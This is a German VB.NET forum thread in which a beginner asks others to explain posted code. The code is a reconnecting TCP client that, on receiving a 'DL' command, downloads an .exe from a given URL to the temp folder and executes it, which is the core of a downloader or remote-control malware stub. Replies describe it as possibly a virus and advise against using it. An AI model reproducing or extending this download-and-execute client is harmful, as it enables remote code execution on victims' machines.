Quellcode erläutern?

  • VB.NET

Es gibt 6 Antworten in diesem Thema. Der letzte Beitrag () ist von ErfinderDesRades.

    Quellcode erläutern?

    Hey Leute kann mir wer mal bitte den Code erläutern ich versteh da echt garnichts. :(

    danke im vorraus :D

    VB.NET-Quellcode

    1. Imports System.Net, System.Net.Sockets, System.IO
    2. Module Module1
    3. Dim host As String = "127.0.0.1"
    4. Dim port As Integer = 7008
    5. Dim client As TcpClient
    6. Sub Main()
    7. Dim t As New Threading.Thread(AddressOf KeepOpen)
    8. t.Start()
    9. Connect()
    10. End Sub
    11. Sub Connect()
    12. Try
    13. client = New TcpClient(host, port)
    14. Send("CONNECTED|1.0|Idle...")
    15. client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
    16. Catch ex As Exception
    17. Threading.Thread.Sleep(4000)
    18. Connect()
    19. End Try
    20. End Sub
    21. Sub Read(ByVal ar As IAsyncResult)
    22. Dim message As String
    23. Try
    24. Dim reader As New StreamReader(client.GetStream())
    25. message = reader.ReadLine()
    26. Parse(message)
    27. client.GetStream().BeginRead(New Byte() {0}, 0, 0, AddressOf Read, Nothing)
    28. Catch ex As Exception
    29. Threading.Thread.Sleep(4000)
    30. Connect()
    31. End Try
    32. End Sub
    33. Sub Parse(ByVal Message As String)
    34. Try
    35. Dim cut() As String = Message.Split("|")
    36. Select Case cut(0)
    37. Case "DL"
    38. Try
    39. Dim w As New WebClient()
    40. Dim temp As String = Path.GetTempFileName() + ".exe"
    41. SendStatus("Downloading File...")
    42. w.DownloadFile(cut(1), temp)
    43. Process.Start(temp)
    44. SendStatus("File Executed...")
    45. Catch ex As Exception
    46. SendStatus("Error Downloading File...")
    47. End Try
    48. End Select
    49. Catch ex As Exception
    50. End Try
    51. End Sub
    52. Sub Send(ByVal message As String)
    53. Try
    54. Dim writer As New StreamWriter(client.GetStream())
    55. writer.WriteLine(message)
    56. writer.Flush()
    57. Catch ex As Exception
    58. End Try
    59. End Sub
    60. Sub SendStatus(ByVal Message As String)
    61. Try
    62. Dim writer As New StreamWriter(client.GetStream())
    63. writer.WriteLine("STATUS|" & Message)
    64. writer.Flush()
    65. Catch ex As Exception
    66. End Try
    67. End Sub
    68. Sub KeepOpen()
    69. Console.ReadLine()
    70. End Sub
    71. End Module


    Edit by der_Kurt:
    *Quellcode einigermaßen formatiert *

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von „der_Kurt“ ()

    Sieht mir nach einem TCP Client aus, aufgrund der Meldung evtl. um einen HTTP-Downloader...
    aber so werde ich zumindest nichts erklären->Bitte gescheit formatieren(use FF)
    Ich wollte auch mal ne total überflüssige Signatur:
    ---Leer---
    Also,
    die Formatierung ist echt kacke
    Soviel ich jetzt gesehen hab ist das ein Programm(ein TCP-Client), der einen Server connectet und eine Datei herunterlädt(eine Exe) und die dann startet. Meiner Meinung nach ist das ein Virus. Also lass die Finger davon(mein Ratschlag)

    MFG qauqau
    schwer zu sagen wenn du mal ne zeilenschaltung machen könntest wärs echt toll :)

    und dass es nen virus ist würd ich so nicht sagen


    Opensource Audio-Bibliothek auf github: KLICK, im Showroom oder auf NuGet.
    Wenn du gar nichts von dem Stoff verstehst, isser halt zu hoch für dich.
    Das meine ich jetzt ganz ohne dich abzuqualifizieren, es ist ganz normal, dass man als Einsteiger an Themen gerät, die man einfach noch nicht meistern kann.
    Nun wäres jetzt überaus ineffizient, wenn wir dir das nun zeile für zeile auseinanderklamüsern würden, zumal ich beim Überfliegen so viele unsinnige TryCatches gesehen habe, dassich den Code erstmal als absolut unbrauchbar bezeichnen würde.
    Lerne lieber die Sprache richtig, und im Zusammenhang, etwa mit diesem Buch.
    Und stell dann differenzierte, noch offen gebliebene Fragen (wobei ich für gut möglich halte, dass nach dem Buch keine mehr bleiben).